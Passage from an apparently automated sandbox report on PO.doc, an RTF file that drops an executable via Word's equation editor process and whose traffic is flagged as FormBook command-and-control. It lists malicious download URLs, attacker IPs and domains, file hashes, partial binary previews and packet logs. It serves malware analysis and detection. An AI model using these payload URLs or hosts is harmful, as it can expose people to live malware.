                                              http://www.piriform.com/ccleanerexplorer.exe, 00000007.00000000.467666466.00000000045CF000.00000004.00000001.sdmpfalse
                                                		high
                                                http://computername/printers/printername/.printerexplorer.exe, 00000007.00000000.427099874.0000000004650000.00000002.00020000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		low
                                                http://www.%s.comPAexplorer.exe, 00000007.00000000.463319655.0000000001BE0000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.694748305.00000000031E0000.00000002.00020000.sdmpfalse
                                                • URL Reputation: safe
                                                		low
                                                http://www.autoitscript.com/autoit3explorer.exe, 00000007.00000000.421707245.0000000000255000.00000004.00000020.sdmpfalse
                                                  		high
                                                  https://support.mozilla.orgexplorer.exe, 00000007.00000000.421707245.0000000000255000.00000004.00000020.sdmpfalse
                                                    		high
                                                    http://servername/isapibackend.dllexplorer.exe, 00000007.00000000.465106140.0000000003E50000.00000002.00020000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		low

                                                    Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    63.250.43.8
                                                    		www.audiofactaesthetic.comUnited States
                                                    		22612NAMECHEAP-NETUSfalse
                                                    185.239.243.112
                                                    		fantecheo.tkMoldova Republic of
                                                    		55933CLOUDIE-AS-APCloudieLimitedHKfalse
                                                    99.83.154.118
                                                    		www.personowner.guruUnited States
                                                    		16509AMAZON-02USfalse

                                                    General Information

                                                    Joe Sandbox Version:33.0.0 White Diamond
                                                    Analysis ID:492582
                                                    Start date:28.09.2021
                                                    Start time:20:41:36
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 13m 11s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Sample file name:PO.doc
                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                    Number of analysed new started processes analysed:12
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.expl.evad.winDOC@12/8@3/3
                                                    EGA Information:Failed
                                                    HDC Information:
                                                    • Successful, ratio: 12.8% (good quality ratio 12.3%)
                                                    • Quality average: 73.6%
                                                    • Quality standard deviation: 26.7%
                                                    HCA Information:
                                                    • Successful, ratio: 95%
                                                    • Number of executed functions: 116
                                                    • Number of non-executed functions: 33
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Found application associated with file extension: .doc
                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                    • Attach to Office via COM
                                                    • Scroll down
                                                    • Close Viewer
                                                    Warnings:
                                                    Show All
                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    20:42:20API Interceptor29x Sleep call for process: EQNEDT32.EXE modified
                                                    20:42:21API Interceptor114x Sleep call for process: ibeframnk863.exe modified
                                                    20:43:05API Interceptor131x Sleep call for process: svchost.exe modified
                                                    20:44:01API Interceptor1x Sleep call for process: explorer.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    No context

                                                    Domains

                                                    No context

                                                    ASN

                                                    No context

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ibefrankszx[1].exe
                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:downloaded
                                                    Size (bytes):624640
                                                    Entropy (8bit):7.132231741936528
                                                    Encrypted:false
                                                    SSDEEP:12288:kzqzgNi+hBr7IUAYpHOSpUeR7/UbuxaWsbkUb+3tkvfY:kvNi+hBr8UAGFBVUbuoWsbkUmgfY
                                                    MD5:CE20BD8F40F78DA603DD17D756745B0A
                                                    SHA1:2538F96FAD951489CD9BB84F9B76B107EA70EAA5
                                                    SHA-256:680993E1220C8D918F192AE23C5C01B6357C58AD68B7CC59FA122C09B7B85CDD
                                                    SHA-512:8138F5FDC8CD0BD806E123CD86FCEB559E7BAFB631D6244F36A86934BE822E6A89CBB9010CBCE8A9A22F9F0F70511E7D0059DE4E8407B9641ECE96848DF5D5D2
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 20%
                                                    Reputation:unknown
                                                    IE Cache URL:http://fantecheo.tk/ibefrankszx.exe
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../.Ra..............0..|............... ........@.. ....................................@.................................4...O.......L............................................................................ ............... ..H............text....{... ...|.................. ..`.rsrc...L............~..............@..@.reloc..............................@..B................h.......H.......p...4.............................................................{....*:.(......}....*..0..$........u......,.(.....{.....{....o ...+..*v i.yE )UU.Z(.....{....o!...X*...0..M........r...p......%..{.....................-.q.............-.&.+.......o"....(#...*....0...........~......a ...._...da.+..*....0............{.....+..*&...}....*...0..............(.....+..*...0..?......... ...._....c.....{....(....}.......{....(....}.....{....f.+..*..0..X...........o$.......+6...Y.
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{944DEEB7-0445-4A5E-BEFC-7294BB0C5BA3}.tmp
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):13312
                                                    Entropy (8bit):3.5180602819243387
                                                    Encrypted:false
                                                    SSDEEP:384:L5J4SoLBBtlzYZuF8mDo+RvaWi2P27MPPFA7hZ:LTWBzF8P+RPAMXkhZ
                                                    MD5:EF344FD5E2E1BB5FDE6D53C482442333
                                                    SHA1:8C68B189186A18A3C8E8F5632C6F023E2D6108B3
                                                    SHA-256:FB361537266D06F762642B0C32139E14C2A8A5E6D88915B64691322F17E65CAF
                                                    SHA-512:6180A78765E94FF8978E60661155CBBDE6BE113BDBE51854C05FABA1E428FFAA0E4405A45C3BBC9505330383B19BFA6B6B75804E52FB1EA26C2AE9DF0A253F30
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: %.[.4.&.6.).3.?.4.1./.;.?.-.-.4.].?.>.?._.8.`.?.`.*.7.$.?./...7.[.=.[.=.../...4.%.9.~.~.'.4.7.*.1.,.~.:.0.'.|.?.].[.0.-...?.'.2.?.?.*.).?.0.`.9.=.%.^.'.|._...~.[.|.]._.?.@.?.?.?.*.].`.@.1.4.`.#.].*.+.=.!.3.?...4.?.(.|.,.?.?.7.0.?.<.^.6.%...%.%.7.2.5.`.4.|.9./.<.9.:.?.&.;.|.+.'.?.<.).4.'...~.].@.%.[.,.).+.|.?.6.5.>.?.7.!.0.].(.;.>.#.(.=.^.|.&.?.2.$.6.1.(.=.6.;.9.^.?.!.9.:...=.%.0.6.#.?.#.;.|.<.?...?.2.|./.;.?.8.1.#.'.%.<.,.|.~.....3.].:.?.].`.^.*.|.&.>._...6.*.`.|.(./.[.6.].?...0.(...5.1.~.=.-..._.[.%.<.0.?.-.!.6.%.-.).?.?.&.3.+.@.%.-.,...;.^.?.=.].2.'.1.0.1.=.>.1...?.%./.;.`.-.4.1._.?.:.?.3.^./.^.).>.2.>.1.=.3.].(.^.'.=...;.1.-.?.%.;.3.,.#.<.1./.#./.).<.8.6...8._.,.`.8.&.9.%.-.-...6.1.].`.?.9.@.?...(.?...;.[.$.-.$.%.?.~.(.'.?.=.%.]._.*.<.@.?.=.).?.?.@.-.$.[.....'._.!.7.......7.2.*.%.?.?.3.?.|.0.,./.$.3.@.8.`.7.~.#.,.[.#.?.:.%./.%...?.*.=.1._.....(.%.8.2.0.-.5.>.?.~.&.!.?.2._.@.0.!.1.[.[.$.,.;.+...2.4.).]...|.1.!.].2.0.?.>./.1.$.^.(.[.~.(.;.:.).&...?...7.#.,.4.9.?.,.8.6.?.0.?.6...0.|.`.
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F37BA74A-2884-4D29-90C1-0C63AEE1F3DB}.tmp
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1024
                                                    Entropy (8bit):0.05390218305374581
                                                    Encrypted:false
                                                    SSDEEP:3:ol3lYdn:4Wn
                                                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO.LNK
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:58 2021, mtime=Mon Aug 30 20:08:58 2021, atime=Wed Sep 29 02:42:18 2021, length=19661, window=hide
                                                    Category:dropped
                                                    Size (bytes):1936
                                                    Entropy (8bit):4.478028575484341
                                                    Encrypted:false
                                                    SSDEEP:24:8NnUk/XTuzLI8hvDevQiDv3qRE/7Es2NnUk/XTuzLI8hvDevQiDv3qRE/7Eg:8Gk/XTkrFIaRWf2Gk/XTkrFIaRWB
                                                    MD5:249B619EB64074F7ACC92F26C11AC377
                                                    SHA1:8AAE07E6E2184BE746E4FB3EFC0AFF9D3E2477F7
                                                    SHA-256:4BA781EECD035514A0FB60DB92E641668DA36ACF24A7AD82A1F541E37306BD05
                                                    SHA-512:41C477D88E9BA235268482547AD81368FD02DE529EFF56F424B4857EB3751266121BEFE2C5F5F97748448BDCB27701A79B3B3C6B1265CB9B210014572C2CA872
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: L..................F.... ...9..?...9..?....}l.....L...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S ...user.8......QK.X.S .*...&=....U...............A.l.b.u.s.....z.1......S!...Desktop.d......QK.X.S!.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....P.2..L..=SJ. .PO.doc..:.......S ..S .*.........................P.O...d.o.c.......p...............-...8...[............?J......C:\Users\..#...................\\849224\Users.user\Desktop\PO.doc.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.O...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......849224..........D_....3N...W...9..g............[D_....3N...W...9..g............[....L..................F.... ...9..?
                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):44
                                                    Entropy (8bit):3.8399229603149925
                                                    Encrypted:false
                                                    SSDEEP:3:M1gAYCtc6YCmX1gAYCv:MiAYUc6Y6AYs
                                                    MD5:088B8C27544B9C39170C0441E31C3B1A
                                                    SHA1:05AD138F31421DEFB3C09831B6CFE977ABE372B8
                                                    SHA-256:C0953ABC66A9CA6017E4AF0644E9EE79209D64990513C518FDE3AAEE03F005EF
                                                    SHA-512:13EBB74599AA1310B975859AC05AF04B6004350266895E86E3A112559C315AD27950FCF1785B483BF2433CCBD9201DF8DAEF606E925EFECFC39B3D8967A212BE
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: [doc]..PO.LNK=0..PO.LNK=0..[doc]..PO.LNK=0..
                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):162
                                                    Entropy (8bit):2.503835550707526
                                                    Encrypted:false
                                                    SSDEEP:3:vrJlaCkWtVyYpfHh233WWPAyfGpKyH/ln:vdsCkWtxJgJXKl
                                                    MD5:6462452E1083FFF3724A32DC01771E8B
                                                    SHA1:244116899824E727C5C399064F004C71D88F7254
                                                    SHA-256:869216753E7235557D0BDCC32046E7DA62B2DD69B9B7175F27AD546161F1EB2A
                                                    SHA-512:303C93E9E5AB236053693ECE6B9925F4E451EE28834A46DCF2A23311CD254F022967632852AFEB46E4C842DCE42072192F0B726B48FBBE9D5FA907918B71CE88
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                    C:\Users\user\AppData\Roaming\ibeframnk863.exe
                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):624640
                                                    Entropy (8bit):7.132231741936528
                                                    Encrypted:false
                                                    SSDEEP:12288:kzqzgNi+hBr7IUAYpHOSpUeR7/UbuxaWsbkUb+3tkvfY:kvNi+hBr8UAGFBVUbuoWsbkUmgfY
                                                    MD5:CE20BD8F40F78DA603DD17D756745B0A
                                                    SHA1:2538F96FAD951489CD9BB84F9B76B107EA70EAA5
                                                    SHA-256:680993E1220C8D918F192AE23C5C01B6357C58AD68B7CC59FA122C09B7B85CDD
                                                    SHA-512:8138F5FDC8CD0BD806E123CD86FCEB559E7BAFB631D6244F36A86934BE822E6A89CBB9010CBCE8A9A22F9F0F70511E7D0059DE4E8407B9641ECE96848DF5D5D2
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 20%
                                                    Reputation:unknown
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../.Ra..............0..|............... ........@.. ....................................@.................................4...O.......L............................................................................ ............... ..H............text....{... ...|.................. ..`.rsrc...L............~..............@..@.reloc..............................@..B................h.......H.......p...4.............................................................{....*:.(......}....*..0..$........u......,.(.....{.....{....o ...+..*v i.yE )UU.Z(.....{....o!...X*...0..M........r...p......%..{.....................-.q.............-.&.+.......o"....(#...*....0...........~......a ...._...da.+..*....0............{.....+..*&...}....*...0..............(.....+..*...0..?......... ...._....c.....{....(....}.......{....(....}.....{....f.+..*..0..X...........o$.......+6...Y.
                                                    C:\Users\user\Desktop\~$PO.doc
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):162
                                                    Entropy (8bit):2.503835550707526
                                                    Encrypted:false
                                                    SSDEEP:3:vrJlaCkWtVyYpfHh233WWPAyfGpKyH/ln:vdsCkWtxJgJXKl
                                                    MD5:6462452E1083FFF3724A32DC01771E8B
                                                    SHA1:244116899824E727C5C399064F004C71D88F7254
                                                    SHA-256:869216753E7235557D0BDCC32046E7DA62B2DD69B9B7175F27AD546161F1EB2A
                                                    SHA-512:303C93E9E5AB236053693ECE6B9925F4E451EE28834A46DCF2A23311CD254F022967632852AFEB46E4C842DCE42072192F0B726B48FBBE9D5FA907918B71CE88
                                                    Malicious:true
                                                    Reputation:unknown
                                                    Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                    Static File Info

                                                    General

                                                    File type:Rich Text Format data, unknown version
                                                    Entropy (8bit):4.426499459410393
                                                    TrID:
                                                    • Rich Text Format (5005/1) 55.56%
                                                    • Rich Text Format (4004/1) 44.44%
                                                    File name:PO.doc
                                                    File size:19661
                                                    MD5:601260b52c23f2be80998a22b2fc77dd
                                                    SHA1:e4fd634040abd4f6b58aa7efe8fb59f7e64a395f
                                                    SHA256:2dfd64c86cfb81ed8a280b74e6e7b244a8a98d3788c8c552266ddd5327e4f055
                                                    SHA512:d8beacb0e01df26d41812d4152ff8afe46c25e620d200af0e9d6a27b6f89cd4dc915d77ca2f4f3e04dc78ff43192a4d5b5e52674eef4a000a0cc35dc4ef0df22
                                                    SSDEEP:384:Ac8lCXedYICEJZv+c3zvYcK1CJ+8sgl+0nmhWnPo9lMVEdVACzl9Q2qmNj7aJ52E:AvcXe2ILvZ3tKtbvWbV1MQfEE
                                                    File Content Preview:{\rtf9511%[4&6)3?41/;?--4]?>?_8`?`*7$?/.7[=[=./.4%9~~'47*1,~:0'|?][0-.?'2??*)?0`9=%^'|_.~[|]_?@???*]`@14`#]*+=!3?.4?(|,??70?<^6%.%%725`4|9/<9:?&;|+'?<)4'.~]@%[,)+|?65>?7!0](;>#(=^|&?2$61(=6;9^?!9:.=%06#?#;|<?.?2|/;?81#'%<,|~..3]:?]`^*|&>_.6*`|(/[6]?.0(.51

                                                    File Icon

                                                    Icon Hash:e4eea2aaa4b4b4a4

                                                    Static RTF Info

                                                    Objects

                                                    IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                    000001860hno
                                                    100001836h2embeddedequatiON.32142no

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    09/28/21-20:44:09.686778TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.2299.83.154.118
                                                    09/28/21-20:44:09.686778TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.2299.83.154.118
                                                    09/28/21-20:44:09.686778TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916680192.168.2.2299.83.154.118
                                                    09/28/21-20:44:09.848998TCP1201ATTACK-RESPONSES 403 Forbidden804916699.83.154.118192.168.2.22

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Sep 28, 2021 20:42:28.754209042 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.780873060 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.780987024 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.781491041 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.808105946 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.809154034 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.809184074 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.809206009 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.809228897 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.809257030 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.809289932 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.809351921 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.809380054 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.809402943 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.809406042 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.809427977 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.809437037 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.809469938 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.809604883 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.809627056 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.809653997 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.809683084 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.822540998 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.836040020 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836074114 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836096048 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836121082 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836143017 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.836143970 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836167097 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.836169004 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836193085 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836193085 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.836214066 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836225033 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.836246014 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836246014 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.836265087 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836282969 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836302042 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836344004 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.836378098 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836396933 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836453915 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836464882 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.836473942 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836606979 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.836702108 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836721897 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836738110 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836755991 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.836785078 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.836817980 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.838309050 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.863256931 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.863292933 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.863317966 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.863341093 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.863363981 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.863387108 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.863408089 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.863434076 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.863518000 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.863886118 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.863925934 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.863939047 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.863950968 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.863954067 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.863970041 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.863974094 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.863981962 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.863991976 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864010096 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864025116 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864039898 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864061117 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864084959 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864089012 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864101887 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864123106 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864142895 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864147902 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864159107 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864162922 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864180088 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864181995 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864198923 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864206076 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864219904 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864237070 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864317894 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864340067 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864366055 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864376068 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864382982 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864398003 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864423037 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864438057 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864521027 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864567041 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864590883 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864612103 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864633083 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864669085 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864763021 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864779949 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864803076 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864820004 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864836931 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.864908934 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.864976883 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.865014076 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.865197897 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.865222931 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.865225077 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.865226984 CEST8049165185.239.243.112192.168.2.22
                                                    Sep 28, 2021 20:42:28.865236044 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.865292072 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.865320921 CEST4916580192.168.2.22185.239.243.112
                                                    Sep 28, 2021 20:42:28.869268894 CEST4916580192.168.2.22185.239.243.112
